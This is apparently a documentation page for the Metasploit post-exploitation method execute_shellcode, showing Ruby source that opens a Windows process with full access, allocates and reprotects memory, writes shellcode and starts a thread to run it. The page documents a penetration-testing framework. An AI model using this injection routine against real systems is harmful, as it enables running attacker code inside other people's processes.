Method: Msf::Post::Windows::Process#execute_shellcode

Defined in:
lib/msf/core/post/windows/process.rb

#execute_shellcode(shellcode, base_addr = nil, pid = nil) ⇒ Boolean

Injects shellcode into a process and executes it.

Parameters:

  • shellcode (String)

    The shellcode to execute

  • base_addr (Integer) (defaults to: nil)

    The base address at which to allocate the memory

  • pid (Integer) (defaults to: nil)

    The process ID to inject into; if unspecified, the shellcode is executed in place (in the session's own process).

Returns:

  • (Boolean)

    True if successful, otherwise false



# File 'lib/msf/core/post/windows/process.rb', line 127

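# Injects shellcode into a process and runs it in a newly created thread.
#
# When +pid+ is nil the session's own process is used, so the payload runs
# "in place". Memory is allocated in the target (at +base_addr+ when one is
# given), its protection is changed, the payload is written, and a thread is
# started at the allocation's address.
#
# @param shellcode [String] The shellcode to execute
# @param base_addr [Integer, nil] Preferred base address for the allocation;
#   nil lets the target pick
# @param pid [Integer, nil] Process ID to inject into; nil means the
#   session's own process
# @return [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread, false]
#   the created thread on success; false when the payload could not be
#   written in full or the thread could not be created
def execute_shellcode(shellcode, base_addr=nil, pid=nil)
  pid ||= session.sys.process.getpid
  host = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)

  shell_addr =
    if base_addr.nil?
      host.memory.allocate(shellcode.length)
    else
      host.memory.allocate(shellcode.length, nil, base_addr)
    end

  host.memory.protect(shell_addr)

  # A short write leaves a truncated payload in the target; refuse to start a
  # thread on it.
  if host.memory.write(shell_addr, shellcode) < shellcode.length
    vprint_error("Failed to write shellcode")
    return false
  end

  vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
  thread = host.thread.create(shell_addr, 0)
  unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
    vprint_error("Unable to create thread")
    # The original evaluated a bare `nil` here without returning it, so a
    # non-Thread result fell through to the final expression and was reported
    # to the caller as success. Return false, matching the write-failure path
    # and the documented "otherwise false" contract.
    return false
  end
  thread
end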